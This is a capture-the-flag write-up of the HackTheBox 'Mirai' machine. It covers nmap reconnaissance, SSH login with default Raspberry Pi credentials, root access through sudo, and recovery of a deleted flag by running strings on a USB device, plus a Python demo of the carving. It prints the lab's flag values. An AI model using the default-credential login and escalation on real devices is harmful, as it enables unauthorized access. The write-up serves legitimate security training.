Mirai

#Linux #Raspberry #Enumeration #IoT

Mirai is an easy-rated Linux machine from HackTheBox created by Arrexel. It was odd to find nothing obvious at the start: this box rewards researching every small clue, mainly because of its IoT orientation. In this post my IP is 10.10.14.20 and the target's IP is 10.129.210.160.

Gathering Information

First, we check that the machine is alive, then do the classic reconnaissance to get general information about the target.

Local Terminal
ping 10.129.210.160

Pinging 10.129.210.160 with 32 bytes of data:
Reply from 10.129.210.160: bytes=32 time=145ms TTL=63
Reply from 10.129.210.160: bytes=32 time=146ms TTL=63
Reply from 10.129.210.160: bytes=32 time=147ms TTL=63
Reply from 10.129.210.160: bytes=32 time=151ms TTL=63

Ping statistics for 10.129.210.160:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 145ms, Maximum = 151ms, Average = 147ms

The replies above come from the Windows ping (four echo requests by default). The TTL is 63: Linux uses an initial TTL of 64 and Windows 128, and the reply lost one hop on the way back, so this is most likely a Linux machine. Treat it as a heuristic only; the default is trivial to change and some embedded devices use other values.

Local Terminal
nmap -p- --open -T5 -v -n 10.129.210.160 -oG AllPorts

Completed SYN Stealth Scan at 20:44, 49.81s elapsed (65535 total ports)
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1501/tcp  open  sas-3
32400/tcp open  plex
32469/tcp open  unknown

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 50.30 seconds
           Raw packets sent: 68926 (3.033MB) | Rcvd: 68952 (2.758MB)

Local Terminal
nmap -sCV -p 22,53,80,1501,32400,32469 10.129.210.160 -oN WebScan

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-07 20:53 Pacific SA Standard Time
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76 
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1501/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Unauthorized
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Something unusual shows up on port 53: "dnsmasq 2.76". After some research, dnsmasq is a lightweight free-software DNS forwarder and DHCP server, and this old release has a number of published vulnerabilities, so we keep it in mind for later. Two other details are worth noting: the SSH banner (OpenSSH 6.7p1 Debian 5+deb8u3) points to a Debian 8 (jessie) era system, and dnsmasq next to a lighttpd web server on port 80 is a combination we will see again shortly.

  • Browser: http://10.129.210.160

Local Terminal
curl -s -I http://10.129.210.160

HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Content-Length: 0
Date: Mon, 08 May 2023 01:31:47 GMT
Server: lighttpd/1.4.35

Visiting the site in the browser shows nothing useful, but the headers from curl give a new piece of information: "X-Pi-hole". Pi-hole is an application that blocks ads and trackers at the DNS level (that explains the dnsmasq on port 53 and the lighttpd serving its web interface), and it is designed to run on small network-connected embedded devices, typically a Raspberry Pi.

The Raspberry Pi hint was well hidden, so it is worth trying the default Raspbian credentials on the SSH port: user pi, password raspberry.

Local Terminal
ssh pi@10.129.210.160

Exploit?

Target Terminal [Pi]
id

uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)

Look at what we found: group 27(sudo). Membership in the sudo group means pi can run sudo, so we become root by trying the default password... again!

Target Terminal [Pi]
sudo su

Target Root
root@raspberrypi:/home/pi# cd /home/pi
root@raspberrypi:/home/pi# ls -l

total 1440
-rw-r--r-- 1 pi pi 1441764 Aug 13  2017 background.jpg
drwxr-xr-x 3 pi pi    4096 Aug 13  2017 Desktop
drwxr-xr-x 5 pi pi      99 Dec 13  2016 Documents
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Downloads
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Music
drwxr-xr-x 3 pi pi    4096 Aug 13  2017 oldconffiles
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Pictures
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Public
drwxr-xr-x 2 pi pi    1629 Dec 13  2016 python_games
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Templates
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Videos

Plenty of folders to search, so let find do the work:

Target Root
root@raspberrypi:/home/pi# find . -name user.txt
./Desktop/user.txt

root@raspberrypi:/home/pi# cat ./Desktop/user.txt
ff837707441b257a20e32199d7c8838d

And we have the first flag!

Privilege Escalation

Now we locate root.txt the same way, starting from /:

Target Root
root@raspberrypi:/home/pi# cd /
root@raspberrypi:/# find . -name root.txt

./lib/live/mount/persistence/sda2/root/root.txt
./root/root.txt

It is found in two paths. Let's try the usual one first and then the other.

Target Root
cat ./root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Target Root
cat ./lib/live/mount/persistence/sda2/root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Same message in both places, which is expected: /lib/live/mount/persistence/sda2 is the writable persistence partition of a live-boot system, and the aufs root is built on top of it, so /root/root.txt and the sda2 copy are the same file. We now have to find that USB stick. df -h, which lists every mounted filesystem with its device and usage, is the quickest way:

Target Root
df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  8.8M   92M   9% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick #HERE!
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000

I tried cat /dev/sdb first, which was a bad idea: it is a raw block device and just dumps unreadable binary to the terminal, and listing /dev shows plenty of other device nodes. Trying to execute it fails with Permission denied even as root, because a device node carries no execute bit (and is not something you run anyway). The right tool is strings: the files on the stick were deleted, but unlinking a file on an ext filesystem only removes the directory entry, and the data blocks stay on the device until they are reused, so scanning the raw device for printable text recovers their contents.

Target Root
root@raspberrypi:/dev# /dev/sdb
bash: /dev/sdb: Permission denied

Target Root
root@raspberrypi:/dev# strings /dev/sdb
.DXd.DXd
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Aaaaand... the flag is there in clear text. That is no accident: the deleted file's data blocks on the tiny stick were never overwritten, so strings pulls them straight off the device. The machine is done.
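The last two steps (spotting the stick in df -h, then carving the raw device) can be reproduced offline. The following is an added example of my own, not code from the writeup or from the box: the df text is abridged from the box's own df -h output above, while the toy volume layout, the file names, the 0123... flag value and every function name are my own constructions. The toy "filesystem" deletes files the way ext does, by clearing the entry's pointer and leaving the name bytes and data block in place, which is exactly why strings on /dev/sdb still showed root.txt, damnit.txt and the flag.

```python
import re
from typing import Dict, List, Tuple

# df -h output copied (abridged) from the box above; all parse_df() needs.
DF_OUTPUT = """\
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  8.8M   92M   9% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/1000
"""


def parse_df(text: str) -> List[Tuple[str, str]]:
    """(filesystem, mount point) pairs from `df -h` output, header skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 5)  # keeps a mount point containing spaces intact
        if len(parts) == 6:
            rows.append((parts[0], parts[5]))
    return rows


def interesting_mounts(text: str) -> Dict[str, List[str]]:
    """Mounts worth a second look on a live-boot box: real block devices under
    /media or /mnt (a plugged-in stick) and the live-boot persistence partitions,
    i.e. the writable layer the aufs root is built from (same files as under /)."""
    out: Dict[str, List[str]] = {"removable": [], "persistence": []}
    for fs, mnt in parse_df(text):
        if fs.startswith("/dev/") and mnt.startswith(("/media/", "/mnt/")):
            out["removable"].append(fs)
        if mnt.startswith("/lib/live/mount/persistence/"):
            out["persistence"].append(mnt)
    return out


# --- constructed toy volume: block 0 is the directory, one data block per file ---
BLOCK = 512
CONSTRUCTED_FLAG = "0123456789abcdef0123456789abcdef"  # made-up value, not the box's flag


def make_image(files: Dict[str, bytes]) -> bytearray:
    """Directory entry format (my own): name, NUL, 4-digit data-block number, NUL."""
    img = bytearray(BLOCK * (len(files) + 1))
    entries = b"".join(f"{n}\0{i + 1:04d}\0".encode() for i, n in enumerate(files))
    img[: len(entries)] = entries
    for i, data in enumerate(files.values()):
        img[BLOCK * (i + 1) : BLOCK * (i + 1) + len(data)] = data
    return img


def unlink(img: bytearray, name: str) -> None:
    """Delete the way ext does: zero the entry's pointer, keep name bytes and data."""
    idx = img.find(name.encode() + b"\0", 0, BLOCK)
    if idx < 0:
        raise FileNotFoundError(name)
    ptr = idx + len(name) + 1
    img[ptr : ptr + 4] = b"0000"


def list_dir(img: bytes) -> List[str]:
    """What `ls` on the mounted stick shows: only entries with a live pointer."""
    fields = [f for f in bytes(img[:BLOCK]).split(b"\0") if f]
    return [fields[i].decode() for i in range(0, len(fields) - 1, 2)
            if fields[i + 1] != b"0000"]


def carve_strings(image: bytes, min_len: int = 4) -> List[str]:
    """strings(1): every run of >= min_len printable ASCII bytes, metadata ignored."""
    return [r.decode() for r in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, image)]


def carve_flags(image: bytes) -> List[str]:
    """32-hex-char tokens (the HTB flag format) anywhere in the raw image."""
    return sorted({m.decode() for m in re.findall(rb"\b[0-9a-f]{32}\b", image)})


def demo() -> Tuple[List[str], List[str], List[str]]:
    """Build the stick, delete the two files, then carve the raw image."""
    img = make_image({
        "lost+found": b"",
        "root.txt": CONSTRUCTED_FLAG.encode() + b"\n",
        "damnit.txt": b"Sorry man I deleted your files off the USB stick.\n",
    })
    unlink(img, "root.txt")
    unlink(img, "damnit.txt")
    raw = bytes(img)
    return list_dir(img), carve_strings(raw), carve_flags(raw)


if __name__ == "__main__":
    print(interesting_mounts(DF_OUTPUT))
    visible, found, flags = demo()
    print("visible after delete:", visible)   # only lost+found
    print("recovered flags:", flags)          # the carved 32-hex token
```

After the two deletions list_dir() reports only lost+found, just as the mounted stick would, yet carve_strings() still returns root.txt, damnit.txt and the flag because nothing overwrote their bytes. On a real device the same idea is `strings -n 8 /dev/sdb` or `grep -a -oE '[0-9a-f]{32}' /dev/sdb`; it stops working once the blocks are reused, so image the device before writing to it.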
